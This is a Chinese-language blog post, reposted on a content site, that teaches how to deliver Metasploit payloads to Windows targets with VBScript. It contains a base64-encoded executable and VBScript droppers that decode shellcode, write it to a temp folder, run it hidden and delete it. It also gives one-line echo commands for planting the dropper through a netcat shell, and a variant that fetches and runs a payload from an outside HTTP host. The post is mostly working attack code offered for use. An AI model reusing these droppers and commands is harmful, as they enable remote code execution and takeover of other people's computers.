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"
  18.   Dim GBHMAfCsea
  19.   Set GBHMAfCsea = CreateObject("Scripting.FileSystemObject")
  20.   Dim nYosrMtHSIOKSTI
  21.   Dim LNXsqHXEKZQU
  22.   Set nYosrMtHSIOKSTI = GBHMAfCsea.GetSpecialFolder(2)
  23.   LNXsqHXEKZQU = nYosrMtHSIOKSTI & "\" & GBHMAfCsea.GetTempName()
  24.   GBHMAfCsea.CreateFolder(LNXsqHXEKZQU)
  25.   YeQZhbvaLPekFW = LNXsqHXEKZQU & "\" & "QoziwORKliqRDPs.exe"
  26.   Dim voFeIDpffjdo
  27.   Set voFeIDpffjdo = CreateObject("Wscript.Shell")
  28.   WwqoNcaCIbw = oSpLpsWeU(cTENSbYbnWY)
  29.   Set WQwWDbhse = CreateObject("ADODB.Stream")
  30.   WQwWDbhse.Type = 1
  31.   WQwWDbhse.Open
  32.   WQwWDbhse.Write WwqoNcaCIbw
  33.   WQwWDbhse.SaveToFile YeQZhbvaLPekFW, 2
  34.   voFeIDpffjdo.run YeQZhbvaLPekFW, 0, true
  35.   GBHMAfCsea.DeleteFile(YeQZhbvaLPekFW)
  36.   GBHMAfCsea.DeleteFolder(LNXsqHXEKZQU)
  37. End Function
  38.  
  39. skbfzWOqR

演示:
可以把生成的payload放到服务器,然后再目标系统上执行ps代码,文章开头说的远程下载:



如何以简单/兼容的方式运行payload?

阅读代码,我们可以创建一个名为msf.vbs的简单的vbs脚本来执行shellcode。 vbs脚本可以在Windows XP / 2003 / Vista / 7/8/10/2008/2012 / ....上执行

  1. shellcode = WScript.Arguments.Item(0)
  2. strXML = "" & shellcode & ""
  3. Set oXMLDoc = CreateObject("MSXML2.DOMDocument.3.0")
  4. oXMLDoc.LoadXML(strXML) decode = oXMLDoc.selectsinglenode("B64DECODE").nodeTypedValue
  5. set oXMLDoc = nothing
  6.  Dim fso
  7. Set fso = CreateObject("Scripting.FileSystemObject")
  8. Dim tempdir
  9. Dim basedir
  10. Set tempdir = fso.GetSpecialFolder(2)
  11. basedir = tempdir & "\" & fso.GetTempName()
  12. fso.CreateFolder(basedir)
  13. tempexe = basedir & "\" & "test.exe"
  14. Dim adodbstream
  15. Set adodbstream = CreateObject("ADODB.Stream")
  16. adodbstream.Type = 1
  17. adodbstream.Open
  18. adodbstream.Write decode
  19. adodbstream.SaveToFile tempexe, 2
  20. Dim wshell
  21. Set wshell = CreateObject("Wscript.Shell")
  22. wshell.run tempexe, 0, true
  23. fso.DeleteFile(tempexe)
  24. fso.DeleteFolder(basedir)
  25.  
  26. Ok, how to run it in cmd.exe ? Do you want  to paste the code line by line ?  A simple command is created as follow:

用一个简单的命令上传msf.vbs到目标系统:

echo shellcode = WScript.Arguments.Item(0):strXML = ^"^^" ^& shellcode ^& ^"^<^/B64DECODE^>^":Set oXMLDoc = CreateObject(^"MSXML2.DOMDocument.3.0^"):oXMLDoc.LoadXML(strXML):decode = oXMLDoc.selectsinglenode(^"B64DECODE^").nodeTypedValue:set oXMLDoc = nothing:Dim fso:Set fso = CreateObject(^"Scripting.FileSystemObject^"):Dim tempdir:Dim basedir:Set tempdir = fso.GetSpecialFolder(2):basedir = tempdir ^& ^"\^" ^& fso.GetTempName():fso.CreateFolder(basedir):tempexe = basedir ^& ^"\^" ^& ^"test.exe^":Dim adodbstream:Set adodbstream = CreateObject(^"ADODB.Stream^"):adodbstream.Type = 1:adodbstream.Open:adodbstream.Write decode:adodbstream.SaveToFile tempexe, 2:Dim wshell:Set wshell = CreateObject(^"Wscript.Shell^"):wshell.run tempexe, 0, true:fso.DeleteFile(tempexe):fso.DeleteFolder(basedir) > %TEMP%\msf.vbs

用msf.vbs和cscript.exe执行metasploit payload:

C:\Documents and Settings\test\Desktop> cscript.exe msf.vbs <msf-vbs-shellcode>


绕过nc shell缓冲区大小限制

如果脚本在本地主机上的cmd.exe中使用,则一切正常。 但是,如果它在netcat cmd shell中使用,则 payload将被破坏。例如:

  1. C:\Documents and Settings\test\Desktop>cscript.exe %TEMP%\msf.vbs TVqQAAMAA.....AAAAAP
  2.  
  3. Microsoft (R) Windows Script Host Version 5.7
  4. Copyright (C) Microsoft Corporation. All rights reserved.
  5.  
  6. C:\DOCUME~1\test\LOCALS~1\Temp\msf.vbs(1, 53) Microsoft VBScript compilation error: Syntax error
  • origin payload size: 6160
  • netcat handle payload size: 4068

请自己尝试,为了安全测试,另外创建了一个vbs脚本。

echo strFileURL = WScript.Arguments.Item(0):Set objXMLHTTP = CreateObject(^"MSXML2.XMLHTTP^"):objXMLHTTP.open ^"GET^", strFileURL, false:objXMLHTTP.send():shellcode = objXMLHTTP.responseText:strXML = ^"^<B64DECODE xmlns:dt=^" ^& Chr(34) ^& ^"urn:schemas-microsoft-com:datatypes^" ^& Chr(34) ^& ^" ^" ^& ^"dt:dt=^" ^& Chr(34) ^& ^"bin.base64^" ^& Chr(34) ^& ^"^>^" ^& shellcode ^& ^"^<^/B64DECODE^>^":Set oXMLDoc = CreateObject(^"MSXML2.DOMDocument.3.0^"):oXMLDoc.LoadXML(strXML):decode = oXMLDoc.selectsinglenode(^"B64DECODE^").nodeTypedValue:set oXMLDoc = nothing:Dim fso:Set fso = CreateObject(^"Scripting.FileSystemObject^"):Dim tempdir:Dim basedir:Set tempdir = fso.GetSpecialFolder(2):basedir = tempdir ^& ^"\^" ^& fso.GetTempName():fso.CreateFolder(basedir):tempexe = basedir ^& ^"\^" ^& ^"test.exe^":Dim adodbstream:Set adodbstream = CreateObject(^"ADODB.Stream^"):adodbstream.Type = 1:adodbstream.Open:adodbstream.Write decode:adodbstream.SaveToFile tempexe, 2:Dim wshell:Set wshell = CreateObject(^"Wscript.Shell^"):wshell.run tempexe, 0, true:fso.DeleteFile(tempexe):fso.DeleteFolder(basedir):Set fso = Nothing > %TEMP%\msf.vbs

运行以下命令来执行您的vbs payload:

START /B cscript.exe %TEMP%\msf.vbs http://192.168.1.100:8080/payload.txt

参考来源


声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/小蓝xlanll/article/detail/388961
推荐阅读
相关标签

Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。

  

闽ICP备14008679号